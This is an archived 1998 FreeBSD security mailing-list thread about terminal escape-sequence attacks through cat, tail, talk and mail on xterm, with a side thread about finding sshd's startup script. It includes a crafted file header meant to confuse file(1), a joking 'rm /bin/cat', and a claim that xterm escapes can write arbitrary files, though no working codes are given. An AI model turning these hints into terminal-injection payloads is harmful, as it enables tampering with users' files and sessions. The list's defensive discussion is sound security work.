>files. The correct solution is to fix terminal emulators to ignore >dangerous escape characters. The fact of the matter is that this is defined behaviour. cat by default sends input to the terminal. The terminal processes certain input in certain ways. 'Fixing' terms would break an installed base of tools that use those escape characters. Perhaps processing escapes was a bad design idea - I certainly won't try to defend it from a security standpoint. But breaking a ton of tools to fix a different set is not a workable solution. As far as "what about the users" goes, I know of no way to save them from all the ways they can shoot themselves in the foot, save disabling a majority of the supplied OS utilities. I disagree that 'fixing' the terminals is the correct solution, even if they can be 'fixed' to provide the desired results without breaking compatibility (which I don't believe is possible, but then I haven't investigated it). From a security standpoint, it _might_ be, in some contexts. I find it odd that this one is suddenly getting so much attention suddenly. Nature of mailing lists, I suppose. -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 16:10:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA21915 for freebsd-security-outgoing; Thu, 10 Sep 1998 16:10:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA21895 for ; Thu, 10 Sep 1998 16:10:10 -0700 (PDT) (envelope-from karl@Mars.mcs.net) Received: from Mars.mcs.net (karl@Mars.mcs.net [192.160.127.85]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id SAA03462; Thu, 10 Sep 1998 18:09:57 -0500 (CDT) Received: (from karl@localhost) by Mars.mcs.net (8.8.7/8.8.2) id SAA02966; Thu, 10 Sep 1998 18:09:57 -0500 (CDT) Message-ID: <19980910180956.A2858@mcs.net> Date: Thu, 10 Sep 1998 18:09:56 -0500 From: Karl Denninger To: andrew@squiz.co.nz, Studded Cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: terminal escape exploit (was Re: cat exploit) References: <35F818CA.8647A116@dal.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Andrew McNaughton on Fri, Sep 11, 1998 at 09:19:42AM +1200 Organization: Karl's Sushi and Packet Smashers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Sep 11, 1998 at 09:19:42AM +1200, Andrew McNaughton wrote: > On Thu, 10 Sep 1998, Studded wrote: > > > It seems to me that a lot of people missed the point of one of the > > warnings that someone else posted in response actually. Don't use cat > > routinely to view files. Use more, or better yet less since less doesn't > > view binary files by default. > > It's not just cat that you've got to worry about. tail is another one. > How many people routinely use 'tail -f' to monitor log info that includes > potentially tainted content. > > The problem is not cat. It's xterm and other similar terminal programs. > > Andrew The problem is TERMINALS. You can't bitch that an EMULATOR does exactly what it is claimed to do - emulate the REAL DEVICE. This "exploit" is so old its crusty; it is quite possible to do this on a VT-52 (yes, a real Vt-52, you know those terminals that weighed about 100 lbs, had a dinky little screen, were made by DEC and haven't been seen in some 15 years? Yes, those.) -- -- Karl Denninger (karl@denninger.net) Voice: 312-803-6271 x219 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 16:28:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA25388 for freebsd-security-outgoing; Thu, 10 Sep 1998 16:28:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-05.igrin.co.nz [202.49.245.84]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA25379 for ; Thu, 10 Sep 1998 16:28:14 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id LAA06172 for ; Fri, 11 Sep 1998 11:28:01 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Fri, 11 Sep 1998 11:28:01 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: security@FreeBSD.ORG Subject: Re: terminal escape exploit (was Re: cat exploit) In-Reply-To: <19980910180956.A2858@mcs.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Karl Denninger wrote: > The problem is TERMINALS. > > You can't bitch that an EMULATOR does exactly what it is claimed to do - > emulate the REAL DEVICE. > > This "exploit" is so old its crusty; it is quite possible to do this on a > VT-52 (yes, a real Vt-52, you know those terminals that weighed about 100 > lbs, had a dinky little screen, were made by DEC and haven't been seen in > some 15 years? Yes, those.) Ok, so the origins are old. It's not an old problem in the sense that it's with us now and still needs fixing. I presume if it hasn't been then there's enough software that uses this 'feature' that it's awkward to throw it out.Could someone explain why this functionality is needed? Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 17:33:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA06252 for freebsd-security-outgoing; Thu, 10 Sep 1998 17:33:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hyperreal.org (taz.hyperreal.org [209.133.83.16]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id RAA06243 for ; Thu, 10 Sep 1998 17:33:16 -0700 (PDT) (envelope-from brian@hyperreal.org) Received: (qmail 3456 invoked by uid 24); 11 Sep 1998 00:33:06 -0000 Message-ID: <19980911003306.3455.qmail@hyperreal.org> X-Sender: brian@hyperreal.org X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1 Date: Thu, 10 Sep 1998 17:33:41 -0700 To: andrew@squiz.co.nz From: Brian Behlendorf Subject: Re: terminal escape exploit (was Re: cat exploit) Cc: security@FreeBSD.ORG In-Reply-To: References: <35F818CA.8647A116@dal.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:19 AM 9/11/98 +1200, Andrew McNaughton wrote: >On Thu, 10 Sep 1998, Studded wrote: > >> It seems to me that a lot of people missed the point of one of the >> warnings that someone else posted in response actually. Don't use cat >> routinely to view files. Use more, or better yet less since less doesn't >> view binary files by default. > >It's not just cat that you've got to worry about. tail is another one. >How many people routinely use 'tail -f' to monitor log info that includes >potentially tainted content. Yeah, especially when trying to debug a problem that requires root. I do this. >The problem is not cat. It's xterm and other similar terminal programs. I agree. Even if the old-timers around here are saying "it's always been like that, just don't do it and it'll be all OK", I still see this as a design flaw, and would like to believe that "running arbitrary commands" can be prevented without preventing all the legitimate uses for escape sequences. Brian --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- "Common sense is the collection of prejudices | brian@apache.org acquired by the age of eighteen." - Einstein | brian@hyperreal.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 18:21:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA14605 for freebsd-security-outgoing; Thu, 10 Sep 1998 18:21:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from thuvia.demon.co.uk (thuvia.demon.co.uk [193.237.34.248]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA14559 for ; Thu, 10 Sep 1998 18:21:14 -0700 (PDT) (envelope-from mark@thuvia.demon.co.uk) Received: (from mark@localhost) by thuvia.demon.co.uk (8.8.8/8.8.7) id CAA04444 for security@freebsd.org; Fri, 11 Sep 1998 02:21:41 +0100 (BST) Message-Id: <199809110121.CAA04444@thuvia.demon.co.uk> From: mark@thuvia.demon.co.uk (Mark Valentine) Date: Fri, 11 Sep 1998 02:21:41 +0100 In-Reply-To: Jared Mauch's message of Sep 10, 5:19pm X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: security@FreeBSD.ORG Subject: Re: cat exploit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > From: Jared Mauch > Date: Thu 10 Sep, 1998 > Subject: Re: cat exploit > What you really need to do is using a modern file(1), or > more specifically file with a modern magic(5) file, you can determine > the best way to view it. file(1) isn't safe, e.g. try it on a file which starts: #! ^E (Replace ^E with a real control char.) Mark. -- Mark Valentine at Home http://www.thuvia.org/mark/ "I'll be mellow when I'm DEAD." Mark Valentine uses and endorses FreeBSD http://www.freebsd.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 18:29:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA15932 for freebsd-security-outgoing; Thu, 10 Sep 1998 18:29:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA15922 for ; Thu, 10 Sep 1998 18:29:25 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id TAA08422; Thu, 10 Sep 1998 19:26:16 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id TAA02455; Thu, 10 Sep 1998 19:25:46 -0600 Date: Thu, 10 Sep 1998 19:25:46 -0600 Message-Id: <199809110125.TAA02455@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Aleph One Cc: "Jordan K. Hubbard" , Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: References: <18171.905461424@time.cdrom.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Because its non-intuitive. How many end users are going to know that > simply cat'ing a file is dangerous? End users shouldn't be catting other peoples files, and certainly anyone running as root should know better. If you're stupid, nothing will stop you from hurting yourself. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 18:48:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA18725 for freebsd-security-outgoing; Thu, 10 Sep 1998 18:48:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pobox.com (rafft-41.mdm.mkt.execpc.com [169.207.84.169]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id SAA18718 for ; Thu, 10 Sep 1998 18:48:44 -0700 (PDT) (envelope-from hamilton@pobox.com) Message-Id: <199809110148.SAA18718@hub.freebsd.org> Received: (qmail 6854 invoked from network); 10 Sep 1998 20:52:53 -0500 Received: from localhost (HELO pobox.com) (127.0.0.1) by localhost with SMTP; 10 Sep 1998 20:52:53 -0500 To: Brian Behlendorf cc: andrew@squiz.co.nz, security@FreeBSD.ORG Subject: Re: terminal escape exploit (was Re: cat exploit) In-reply-to: Your message of "Thu, 10 Sep 1998 17:33:41 PDT." <19980911003306.3455.qmail@hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 10 Sep 1998 20:52:53 -0500 From: Jon Hamilton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19980911003306.3455.qmail@hyperreal.org>, Brian Behlendorf wrote: } At 09:19 AM 9/11/98 +1200, Andrew McNaughton wrote: } >On Thu, 10 Sep 1998, Studded wrote: } > } >> It seems to me that a lot of people missed the point of one of the } >> warnings that someone else posted in response actually. Don't use cat } >> routinely to view files. Use more, or better yet less since less doesn't } >> view binary files by default. } > } >It's not just cat that you've got to worry about. tail is another one. } >How many people routinely use 'tail -f' to monitor log info that includes } >potentially tainted content. } } Yeah, especially when trying to debug a problem that requires root. I do } this. } } >The problem is not cat. It's xterm and other similar terminal programs. } } I agree. Even if the old-timers around here are saying "it's always been } like that, just don't do it and it'll be all OK", I still see this as a } design flaw, and would like to believe that "running arbitrary commands" } can be prevented without preventing all the legitimate uses for escape } sequences. One legitimate (if questionable) use _is_ to run arbitrary commands (well, to output arbitrary text, the rest is all downhill from there). Is it a good idea? Depends. Could someone who was sick enough to be doing that do it another way? Almost certainly. But you can't change the functionality without affecting _something_ someone is doing _somewhere_. The question is whether the loss of functionality is outweighed by the gains. Peoples' opinions as to the answer to that question are, um, not unanimous, as you see. As has been suggested, the thing to do would be for someone who cares to patch xterm (and rxvt, and anything else that does emulation of virtually any intelligent terminal ever built) to permit a compile- (or, better yet, run-time) option to turn off this feature. Submit the patch to the maintainers of the code in question and argue with them about it if necessary. -- Jon Hamilton hamilton@pobox.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 19:33:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA23898 for freebsd-security-outgoing; Thu, 10 Sep 1998 19:33:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA23893 for ; Thu, 10 Sep 1998 19:33:41 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id WAA17284; Thu, 10 Sep 1998 22:33:26 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: Aleph One cc: security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 16:24:28 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 10 Sep 1998 22:33:26 -0400 Message-ID: <17280.905481206@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Aleph One wrote in message ID : > Because its non-intuitive. How many end users are going to know that > simply cat'ing a file is dangerous? More or less shouldnt protect me. > xterm and rxvt should. Then why are you asking us to stop it? We do not maintain either xterm nor rxvt in the FreeBSD source tree. May I suggest you contact the maintainers of the respective code bases and complain? Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 20:00:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA27424 for freebsd-security-outgoing; Thu, 10 Sep 1998 20:00:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA27402 for ; Thu, 10 Sep 1998 20:00:35 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id XAA05310; Thu, 10 Sep 1998 23:00:05 -0400 (EDT) Date: Thu, 10 Sep 1998 23:00:04 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Jon Hamilton cc: Brian Behlendorf , andrew@squiz.co.nz, security@FreeBSD.ORG Subject: Re: terminal escape exploit (was Re: cat exploit) In-Reply-To: <199809110148.SAA18718@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One will in fact even notice that most UNIX programs that pass text to other user's terminals (write, etc) filter out control characters specifically to prevent this behavior. For a while there was a fad ammong high schoolers (don't know about college students -- wasn't one at the tim) where escape characters could be stuffed into the announcement name presented by talked when a talk username was performed. It would set the alternate font for vt-style terminals. Needless to say, a hard reset in xterm fixed it, and then safety routines were added to clean up the output there also. No doubt people can get around this via DNS -- there are no doubt ways to pass arbitrary text to the terminal of the user by stuffing it in DNS names that get handed to the user. It may also be possible to pass text via syslog and so on. One cool trick if you have write access to the user's terminal device is to use the Tek control codes under Xterm to pop up a Tek display and perform cool graphics tricks. Draw a picture of a tree and have an arrow point at the roots or something. One extremely useful feature in Xterm is the mouse interaction -- program sends escape code, and xterm switches to sending stuff back to the terminal device when a mouse is clicked. This is how Pine does this (and other programs). If we disable escape codes, we do lose some useful behavior. On the other hand, for anyone still using serial terminals, this behavior cannot be disabled at all I would guess. Adding a new menu item in Xterm, a command line flag, and an Xresource that allowed users to disable this behavior might be useful, but I think turning it off loses too much functionality (especially given that it is not clear that the threat is actually a threat). Robert On Thu, 10 Sep 1998, Jon Hamilton wrote: > > In message <19980911003306.3455.qmail@hyperreal.org>, Brian Behlendorf wrote: > } At 09:19 AM 9/11/98 +1200, Andrew McNaughton wrote: > } >On Thu, 10 Sep 1998, Studded wrote: > } > > } >> It seems to me that a lot of people missed the point of one of the > } >> warnings that someone else posted in response actually. Don't use cat > } >> routinely to view files. Use more, or better yet less since less doesn't > } >> view binary files by default. > } > > } >It's not just cat that you've got to worry about. tail is another one. > } >How many people routinely use 'tail -f' to monitor log info that includes > } >potentially tainted content. > } > } Yeah, especially when trying to debug a problem that requires root. I do > } this. > } > } >The problem is not cat. It's xterm and other similar terminal programs. > } > } I agree. Even if the old-timers around here are saying "it's always been > } like that, just don't do it and it'll be all OK", I still see this as a > } design flaw, and would like to believe that "running arbitrary commands" > } can be prevented without preventing all the legitimate uses for escape > } sequences. > > One legitimate (if questionable) use _is_ to run arbitrary commands (well, > to output arbitrary text, the rest is all downhill from there). > Is it a good idea? Depends. Could someone who was sick enough to be > doing that do it another way? Almost certainly. But you can't change > the functionality without affecting _something_ someone is doing _somewhere_. > The question is whether the loss of functionality is outweighed by the gains. > Peoples' opinions as to the answer to that question are, um, not unanimous, > as you see. > > As has been suggested, the thing to do would be for someone who cares > to patch xterm (and rxvt, and anything else that does emulation of > virtually any intelligent terminal ever built) to permit a compile- (or, > better yet, run-time) option to turn off this feature. Submit the > patch to the maintainers of the code in question and argue with them > about it if necessary. > > -- > Jon Hamilton > hamilton@pobox.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 22:26:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA10067 for freebsd-security-outgoing; Thu, 10 Sep 1998 22:26:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA10062 for ; Thu, 10 Sep 1998 22:26:29 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with SMTP id BAA03622; Fri, 11 Sep 1998 01:26:11 -0400 (EDT) Date: Fri, 11 Sep 1998 01:26:11 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: Jamie Lawrence cc: Aleph One , security@FreeBSD.ORG Subject: Re: cat exploit In-Reply-To: <3.0.5.32.19980910144756.01d24c70@204.74.82.151> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 10 Sep 1998, Jamie Lawrence wrote: > At 03:01 PM 9/10/98 -0500, Aleph One wrote: > > >How about something more practical? Like being able to turn off this > >"feature". > > "rm /bin/cat" Cat has little to do with the issue under discussion, despite the subject line. Escape sequences can come from talk requests, naive write(1)-like programs or naive network clients (I have seen the first two, and the third is likely). Unless I missed it, nobody has defended the xterm feature in question on any basis except that that's how it's always been done. I also didn't notice any reports of recent exploits. I'd like to hear a wider variety of opinions on the matter -- in particular, I wonder if anyone still uses the feature for anything, and if it's been exploited. I don't understand why you're so dismissive about it. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 23:05:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA14488 for freebsd-security-outgoing; Thu, 10 Sep 1998 23:05:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.ripco.com (relay.ripco.com [209.100.227.3]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id XAA14480 for ; Thu, 10 Sep 1998 23:05:26 -0700 (PDT) (envelope-from rezidew@rezidew.net) Received: (qmail 24874 invoked from network); 11 Sep 1998 06:05:19 -0000 Received: from soap.rezidew.net (HELO rezidew.net) (209.100.228.86) by relay.ripco.com with SMTP; 11 Sep 1998 06:05:19 -0000 Message-ID: <35F8BF78.4C32DBEF@rezidew.net> Date: Fri, 11 Sep 1998 01:13:12 -0500 From: Graphic Rezidew Organization: rezidew.net X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 2.2.7-RELEASE i386) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: sshd Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ok, now I am just a little bit concerned about this ( maybe I'm over looking something that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set up tcp wrappers and noticed that none of the rules for ssh were working so I took the line for it out of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed that sshd was running on port 22 of my machine. I have done "grep ssh /etc/*" and come back with only the entry in /etc/services and the rules in /etc/hosts.deny and /etc/hosts.allow. I manually went through the /etc/rc.local and found no entry for anything called *ssh*. Until I can get this figured out I have decided to 'chmod 000 /usr/local/sbin/sshd'. Any help in locating the rogue execution of sshd would be greatly appreciated. -- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Rules for driving in New York: (1) Anything done while honking your horn is legal. (2) You may park anywhere if you turn your four-way flashers on. (3) A red light means the next six cars may go through the intersection. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Graphic Rezidew Graphic@rezidew.net http://Graphic.Rezidew.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 23:07:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA14784 for freebsd-security-outgoing; Thu, 10 Sep 1998 23:07:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from iq.org (polysynaptic.iq.org [203.4.184.222]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id XAA14755 for ; Thu, 10 Sep 1998 23:07:40 -0700 (PDT) (envelope-from proff@iq.org) From: proff@iq.org Received: (qmail 18125 invoked by uid 110); 11 Sep 1998 06:07:22 -0000 Message-ID: <19980911060722.18124.qmail@iq.org> Subject: Re: cat exploit In-Reply-To: from Snob Art Genre at "Sep 11, 98 01:26:11 am" To: ben@rosengart.com Date: Fri, 11 Sep 1998 16:07:22 +1000 (EST) Cc: bugtraq@netspace.com X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Thu, 10 Sep 1998, Jamie Lawrence wrote: > > > At 03:01 PM 9/10/98 -0500, Aleph One wrote: > > > > >How about something more practical? Like being able to turn off this > > >"feature". > > > > "rm /bin/cat" > > Cat has little to do with the issue under discussion, despite the > subject line. Escape sequences can come from talk requests, naive > write(1)-like programs or naive network clients (I have seen the first > two, and the third is likely). > > Unless I missed it, nobody has defended the xterm feature in question on > any basis except that that's how it's always been done. I also didn't > notice any reports of recent exploits. > > I'd like to hear a wider variety of opinions on the matter -- in > particular, I wonder if anyone still uses the feature for anything, and > if it's been exploited. I don't understand why you're so dismissive > about it. > > > Ben It's amusing to see this come up again. Several years ago I discovered various amusing tricks one can do with xterm escape sequences (as opposed to vt52/esprit etc which is what everyone else is really yamming on about, but which actually has little to no relevance to xterms -- at least in terms of how one goes about exploiting the dang things). The `xtermxtermxterm' people are seeing after catting binary files is merely a response to ASCII enq (enquire) (^e). It is harmless and simply prompts the terminal to send back it's terminal type (in this case `xterm'). STOP WORRING ABOUT IT. However, using combinations of other escape codes, one can cause xterms (particularly X consortium derived xterms) to do everything from sending back semi-arbitary bytes (I say `semi-arbitary', because I wasn't able to find a way of storing all byte sequences - control codes and a few other characters are not in the running) to writing arbitary files. Yes, you read that right. talkd(8), elm(1), and mail(1) together with an xterm are your friends (well, someone's friends). Cheers, Julian. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 23:36:55 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA18221 for freebsd-security-outgoing; Thu, 10 Sep 1998 23:36:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from redfish.go2net.com (redfish.go2net.com [207.178.55.5]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id XAA18216 for ; Thu, 10 Sep 1998 23:36:54 -0700 (PDT) (envelope-from marcs@go2net.com) Received: from marcs by redfish.go2net.com with smtp (Exim 1.82 #2) id 0zHMnZ-0005Gs-00; Thu, 10 Sep 1998 23:35:13 -0700 Date: Thu, 10 Sep 1998 23:35:13 -0700 (PDT) From: Marc Slemko X-Sender: marcs@redfish To: Graphic Rezidew cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Graphic Rezidew wrote: > ok, now I am just a little bit concerned about this ( maybe I'm over > looking something > that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set > up tcp wrappers > and noticed that none of the rules for ssh were working so I took the > line for it out > of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed ssh isn't started from inetd.conf. The port can be compiled with libwrap support, however, if you compile it properly. > that sshd was > running on port 22 of my machine. I have done "grep ssh /etc/*" and come > back with only > the entry in /etc/services and the rules in /etc/hosts.deny and > /etc/hosts.allow. I > manually went through the /etc/rc.local and found no entry for anything > called *ssh*. /usr/local/etc/rc.d/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 00:00:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA20877 for freebsd-security-outgoing; Fri, 11 Sep 1998 00:00:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-13.igrin.co.nz [202.49.245.92]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA20864 for ; Fri, 11 Sep 1998 00:00:13 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id SAA00398; Fri, 11 Sep 1998 18:59:07 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Fri, 11 Sep 1998 18:59:07 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Graphic Rezidew cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 Sep 1998, Graphic Rezidew wrote: > ok, now I am just a little bit concerned about this ( maybe I'm over > looking something > that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set > up tcp wrappers > and noticed that none of the rules for ssh were working so I took the > line for it out > of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed > that sshd was > running on port 22 of my machine. I have done "grep ssh /etc/*" and come > back with only > the entry in /etc/services and the rules in /etc/hosts.deny and > /etc/hosts.allow. I > manually went through the /etc/rc.local and found no entry for anything > called *ssh*. By default sshd is run from /usr/local/etc/rc.d/sshd.sh. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 11 00:12:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA22875 for freebsd-security-outgoing; Fri, 11 Sep 1998 00:12:29 -0700 (PDT) 